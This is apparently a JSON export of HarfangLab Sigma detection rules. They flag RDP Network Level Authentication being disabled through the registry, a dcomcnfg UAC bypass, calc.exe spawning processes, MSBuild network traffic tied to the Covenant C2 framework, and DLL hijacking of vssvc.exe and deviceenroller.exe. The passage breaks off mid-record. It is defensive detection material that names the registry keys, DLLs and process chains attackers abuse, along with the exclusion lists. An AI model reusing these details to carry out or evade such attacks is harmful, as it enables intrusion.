"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c2271b8c-4c7c-4704-8b7c-2780abf2d9d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620476Z",
"creation_date": "2026-03-23T11:45:34.620478Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620482Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/cannot-connect-rdp-azure-vm",
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1021/001/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1112_nla_disable.yml",
"content": "title: NLA for Remote Desktop Services Disabled\nid: c2271b8c-4c7c-4704-8b7c-2780abf2d9d2\ndescription: |\n Detects when the Network Level Authentication (NLA) for Remote Desktop Services (RDP) is disabled via a registry modification.\n NLA is a feature of Remote Desktop Services that requires the connecting user to authenticate themselves before a session is established.\n Adversaries can use this technique to allow themselves to arbitrarily connect to hosts via RDP.\n It is recommended to analyze the process responsible for the disabling of NLA to determine its legitimacy and to look for subsequent suspicious RDP sessions on this host.\nreferences:\n - https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/cannot-connect-rdp-azure-vm\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1021/001/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/01/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562.001\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\UserAuthentication'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\UserAuthentication'\n Details:\n - 'DWORD (0x00000000)'\n - 'QWORD (0x00000000-0x00000000)'\n # Parent information of a process can be missing.\n ProcessParentImage|contains: '?'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_schedule:\n ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_windeploy:\n ProcessCommandLine:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n exclusion_systemproperties:\n ProcessImage:\n - '?:\\Windows\\System32\\SystemSettingsAdminFlows.exe'\n - '?:\\Windows\\System32\\SystemPropertiesRemote.exe'\n - '?:\\Windows\\System32\\SystemPropertiesAdvanced.exe'\n - '?:\\Windows\\System32\\SystemPropertiesComputerName.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_siemens:\n - ProcessImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n - ProcessImage: '?:\\Windows\\Temp\\is-*.tmp\\svcr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JWTS SASU'\n - ProcessGrandparentImage|endswith: '\\syngoInstaller.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Siemens AG'\n - ProcessAncestors|contains: '?:\\Program Files\\Siemens\\syngo\\bin\\syngo.Common.LCMService.exe'\n\n exclusion_systemprop:\n ProcessImage|startswith: '?:\\Windows\\System32\\SystemProperties'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_teleport:\n ProcessImage|contains: 'teleport-windows-auth-setup'\n ProcessSignature: 'Gravitational, Inc.'\n\n exclusion_syngo:\n ProcessGrandparentImage|contains: '\\syngo_delta_pkg\\Setup\\syngoInstaller.exe'\n\n exclusion_omadm:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_svcr:\n ProcessImage|endswith: '\\svcr.exe'\n ProcessSigned: 'true'\n ProcessSignature|contains: 'Remote Access World SAS'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_tiworker:\n ProcessCommandLine: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\tiworker.exe'\n\n exclusion_wmiprvse:\n Image: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_programfiles:\n - ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - ProcessGrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessParentImage: '?:\\Windows\\System32\\cmd.exe'\n\n exclusion_azure:\n ProcessAncestors|contains: '|?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe|?:\\Windows\\System32\\services.exe|'\n\n exclusion_immersivecontrolpanel:\n ProcessImage: '?:\\Windows\\System32\\SystemPropertiesProtection.exe'\n ProcessParentImage: '?:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c2271b8c-4c7c-4704-8b7c-2780abf2d9d2",
"rule_name": "NLA for Remote Desktop Services Disabled",
"rule_description": "Detects when the Network Level Authentication (NLA) for Remote Desktop Services (RDP) is disabled via a registry modification.\nNLA is a feature of Remote Desktop Services that requires the connecting user to authenticate themselves before a session is established.\nAdversaries can use this technique to allow themselves to arbitrarily connect to hosts via RDP.\nIt is recommended to analyze the process responsible for the disabling of NLA to determine its legitimacy and to look for subsequent suspicious RDP sessions on this host.\n",
"rule_creation_date": "2025-01-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c23341a2-b8af-4667-99a9-20eafbc185c2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093666Z",
"creation_date": "2026-03-23T11:45:34.093668Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093673Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_dcomcnfg.yml",
"content": "title: UAC Bypass Executed via dcomcnfg\nid: c23341a2-b8af-4667-99a9-20eafbc185c2\ndescription: |\n Detects the execution of the dcomcnfg.exe UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the unsigned DLL creation and loading to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/10\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: 'Windows\\System32\\dcomcnfg.exe'\n ImageLoaded:\n - '?:\\Windows\\System32\\mscoree.dll'\n - '?:\\Windows\\System32\\ole32.dll'\n\n filter_microsoft_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c23341a2-b8af-4667-99a9-20eafbc185c2",
"rule_name": "UAC Bypass Executed via dcomcnfg",
"rule_description": "Detects the execution of the dcomcnfg.exe UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the unsigned DLL creation and loading to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-10",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c233ca54-5e73-43b6-adc2-3649981c36cd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610896Z",
"creation_date": "2026-03-23T11:45:34.610899Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610906Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/pr0xylife/status/1547703381262680064",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "t1203_calc_spawning_suspicious_processes.yml",
"content": "title: Suspicious Process Started by Windows Calculator\nid: c233ca54-5e73-43b6-adc2-3649981c36cd\ndescription: |\n Detects processes started by the Windows Calculator.\n The Calculator is not supposed to spawn any process, therefore this behaviour is suspicious.\n This behaviour was spotted in a Qakbot sample, in a July 2022 campaign, using a DLL sideloading in calc.exe to load a malicious DLL spawning dangerous processes.\n It is recommended to investigate the parent process for suspicious activities and any suspicious DLL that was loaded by `calc.exe`.\nreferences:\n - https://twitter.com/pr0xylife/status/1547703381262680064\n - https://attack.mitre.org/techniques/T1203/\ndate: 2022/07/19\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.Qakbot\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\calc.exe'\n\n exclusion_win32calc:\n Image:\n - '?:\\Windows\\System32\\win32calc.exe'\n - '?:\\Windows\\SysWOW64\\win32calc.exe'\n\n exclusion_werfault:\n Image|endswith: '\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n OriginalFileName: 'WerFault.exe'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c233ca54-5e73-43b6-adc2-3649981c36cd",
"rule_name": "Suspicious Process Started by Windows Calculator",
"rule_description": "Detects processes started by the Windows Calculator.\nThe Calculator is not supposed to spawn any process, therefore this behaviour is suspicious.\nThis behaviour was spotted in a Qakbot sample, in a July 2022 campaign, using a DLL sideloading in calc.exe to load a malicious DLL spawning dangerous processes.\nIt is recommended to investigate the parent process for suspicious activities and any suspicious DLL that was loaded by `calc.exe`.\n",
"rule_creation_date": "2022-07-19",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1203"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c23abf05-c69f-4583-854c-e55eafb78322",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622291Z",
"creation_date": "2026-03-23T11:45:34.622293Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622297Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/building-bypass-with-msbuild/",
"https://github.com/cobbr/Covenant",
"https://attack.mitre.org/techniques/T1127/001/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1127_001_msbuild_suspicious_network_communication.yml",
"content": "title: Suspicious MSBuild.exe Network Communication\nid: c23abf05-c69f-4583-854c-e55eafb78322\ndescription: |\n Detects MSBuild.exe executions initiated by uncommon parent processes that subsequently perform network activity, which may indicate abuse of MSBuild for defense evasion or malicious payload execution.\n Attackers may leverage MSBuild.exe to execute malicious tasks that perform network communication while masquerading as a legitimate build process.\n For example, Covenant, a collaborative cross-platform .NET command-and-control (C2) framework designed for red team operations, used this technique to bypass application whitelisting and execute malicious code via MSBuild.exe.\n It is recommended to investigate the parent process for malicious actions or content as well as subsequent suspicious actions stemming from the MSBuild process itself.\nreferences:\n - https://blog.talosintelligence.com/building-bypass-with-msbuild/\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1127/001/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2021/11/10\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1127.001\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.LOLBin.Msbuild\n - classification.Windows.Framework.Covenant\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n - Image|endswith: '\\MSBuild.exe'\n - ProcessOriginalFileName: 'MSBuild.exe'\n\n exclusion_devenv:\n # C:\\Program Files\\Microsoft Visual Studio\\2022\\Enterprise\\Common7\\IDE\\devenv.exe\n # C:\\Program Files\\Microsoft Visual Studio\\2022\\Professional\\Common7\\IDE\\devenv.exe\n # C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\devenv.exe\n - ProcessParentImage:\n - '?:\\Program Files\\Microsoft Visual Studio\\\\*\\Common7\\IDE\\devenv.exe'\n - '?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\Common7\\IDE\\devenv.exe'\n - '?:\\Program Files\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\MSBuild.exe'\n - '?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\MSBuild.exe'\n - '?:\\Program Files\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\amd64\\MSBuild.exe'\n - '?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\amd64\\MSBuild.exe'\n - ProcessParentImage|endswith: '\\IDE\\devenv.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_jetbrains:\n - ProcessCommandLine:\n - '?:\\Program Files\\JetBrains\\JetBrains Rider*\\tools\\MSBuild\\Current\\Bin\\\\*\\MSBuild.exe'\n - '?:\\Program Files (x86)\\JetBrains\\JetBrains Rider*\\tools\\MSBuild\\Current\\Bin\\\\*\\MSBuild.exe'\n - ProcessParentImage:\n - '?:\\Program Files\\JetBrains\\Rider\\\\*\\Rider.Backend.exe'\n - '?:\\Program Files (x86)\\JetBrains\\Rider\\\\*\\Rider.Backend.exe'\n\n exclusion_citrix:\n ProcessCommandLine:\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\installutil.exe /u /LogFile= ?:\\Program Files (x86)\\Citrix\\System32\\ConfigMgrImpl.dll'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\installutil.exe /u /LogFile= ?:\\Program Files (x86)\\Citrix\\Console MetaFrame Password Manager\\ADToolTraceModule.dll'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\installutil.exe /u /LogFile= ?:\\Program Files (x86)\\Citrix\\Console MetaFrame Password Manager\\PasswordManagerExtension.dll'\n\n # Request to api.nuget.org\n exclusion_nuget:\n ProcessParentCommandLine|contains: '?:\\Program Files\\Microsoft Visual Studio\\\\*\\Community\\Common7\\Tools\\VsDevCmd.bat'\n\n exclusion_blend:\n ProcessParentImage|endswith: '\\IDE\\Blend.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_jenkins:\n ProcessAncestors|contains:\n - '\\bin\\java.exe|?:\\Program Files\\Jenkins\\jenkins.exe|'\n - '\\bin\\java.exe|?:\\Program Files (x86)\\Jenkins\\jenkins.exe|'\n\n exclusion_vscode:\n - ProcessParentImage|endswith: '\\globalStorage\\microsoft-isvexptools.powerplatform-vscode\\pac\\tools\\pac.exe'\n - ProcessAncestors|contains:\n - '\\Microsoft VS Code\\Code.exe|?:\\Windows\\explorer.exe|'\n - '\\Microsoft VS Code\\Code.exe|?:\\Windows\\System32\\OpenWith.exe|'\n\n exclusion_cursor:\n ProcessGrandparentImage: '?:\\Program Files\\cursor\\Cursor.exe'\n\n exclusion_unity:\n ProcessParentImage: '?:\\Program Files\\Unity\\Hub\\Editor\\\\*\\Editor\\Unity.exe'\n\n exclusion_restore:\n ProcessCommandLine|contains: 'MSBuild.exe /t:restore'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c23abf05-c69f-4583-854c-e55eafb78322",
"rule_name": "Suspicious MSBuild.exe Network Communication",
"rule_description": "Detects MSBuild.exe executions initiated by uncommon parent processes that subsequently perform network activity, which may indicate abuse of MSBuild for defense evasion or malicious payload execution.\nAttackers may leverage MSBuild.exe to execute malicious tasks that perform network communication while masquerading as a legitimate build process.\nFor example, Covenant, a collaborative cross-platform .NET command-and-control (C2) framework designed for red team operations, used this technique to bypass application whitelisting and execute malicious code via MSBuild.exe.\nIt is recommended to investigate the parent process for malicious actions or content as well as subsequent suspicious actions stemming from the MSBuild process itself.\n",
"rule_creation_date": "2021-11-10",
"rule_modified_date": "2026-01-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1071",
"attack.t1127.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c2565e8e-4b35-4493-8cab-0b47b8283d74",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599148Z",
"creation_date": "2026-03-23T11:45:34.599152Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599160Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vssvc.yml",
"content": "title: DLL Hijacking via vssvc.exe\nid: c2565e8e-4b35-4493-8cab-0b47b8283d74\ndescription: |\n Detects potential Windows DLL Hijacking via vssvc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vssvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AUTHZ.dll'\n - '\\bcd.dll'\n - '\\DEVOBJ.dll'\n - '\\FLTLIB.DLL'\n - '\\VirtDisk.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c2565e8e-4b35-4493-8cab-0b47b8283d74",
"rule_name": "DLL Hijacking via vssvc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vssvc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c25909aa-c7f1-4d63-a951-d7e1057f35c8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619093Z",
"creation_date": "2026-03-23T11:45:34.619094Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619099Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_deviceenroller.yml",
"content": "title: DLL Hijacking via deviceenroller.exe\nid: c25909aa-c7f1-4d63-a951-d7e1057f35c8\ndescription: |\n Detects potential Windows DLL Hijacking via deviceenroller.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'deviceenroller.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\dmenterprisediagnostics.dll'\n - '\\iri.dll'\n - '\\netutils.dll'\n - '\\omadmapi.dll'\n - '\\samcli.dll'\n - '\\sspicli.dll'\n - '\\umpdc.dll'\n - '\\USERENV.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - 